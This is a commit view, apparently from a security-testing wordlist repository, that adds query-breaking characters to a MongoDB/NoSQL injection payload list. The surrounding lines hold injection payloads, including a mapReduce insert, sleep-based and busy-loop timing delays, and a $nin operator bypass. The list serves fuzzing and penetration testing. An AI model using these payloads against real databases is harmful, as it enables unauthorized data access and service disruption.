Merge pull request #472 from righettod/master

Add characters that can break a MongoDB query when JS expression is used

Source: https://github.com/Charlie-belmer/vulnerable-node-app/blob/master/app/routes/user.route.js#L8
This commit is contained in:
g0tmi1k 2020-07-22 16:25:07 +01:00 committed by GitHub
commit a93ecd7f91
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -18,3 +18,12 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
';sleep(5000); ';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
{$nin: [""]}} {$nin: [""]}}
'
"
\
/
//
;
{
}
: